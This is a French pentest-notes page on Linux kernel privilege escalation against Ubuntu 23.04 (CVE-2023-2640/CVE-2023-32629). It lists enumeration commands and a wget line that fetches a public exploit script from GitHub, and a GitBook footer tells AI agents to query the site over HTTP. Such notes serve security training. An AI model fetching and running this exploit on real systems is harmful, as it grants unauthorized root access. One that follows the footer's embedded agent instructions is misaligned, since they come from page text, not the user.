> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/privesc/kernel-exploitation/ubuntu-23.04-kernel-exploit-linux-privilege-escalation.md).

# Exploitation du noyau (Ubuntu 23.04) - Élévation de privilèges Linux

## Ce que c’est

L’élévation de privilèges du noyau cible les vulnérabilités locales du noyau Linux ou les correctifs spécifiques à la distribution. Ces exploits peuvent être instables, donc la validation de la version et les tests en laboratoire sont importants avant l’exécution. Cette page spécifique se concentre sur **Exploitation du noyau (Ubuntu 23.04)** et maintient le flux d’exploitation pratique : identifiez la condition, validez-la en toute sécurité, puis exécutez la charge utile minimale nécessaire pour prouver l’impact.

## Énumération

Commencez par confirmer le contexte local et la mauvaise configuration exacte avant d’exécuter la voie d’exploitation.

```bash
uname -a
cat /etc/os-release
lsb_release -a 2>/dev/null
```

## Exemples

**Identification de la version du système d'exploitation :**/ Utilisez la `cat /etc/os-release` commande pour vérifier la version du système, notez la présence d'une ancienne version d'Ubuntu (« 23.04 »).

<figure><img src="/files/f88a0aa5b584b346b3b83b8158f97880b376d372" alt=""><figcaption></figcaption></figure>

#### **Téléchargez le script d’élévation de privilèges :**

Téléchargement du script depuis [GitHub ](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629?source=post_page-----ce86940a895f--------------------------------)qui permet l’élévation de privilèges :

```bash
wget https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh
```

<figure><img src="/files/9323c01c4d2ae73b113cbbfcc4b41ad90bb26f51" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/privesc/kernel-exploitation/ubuntu-23.04-kernel-exploit-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
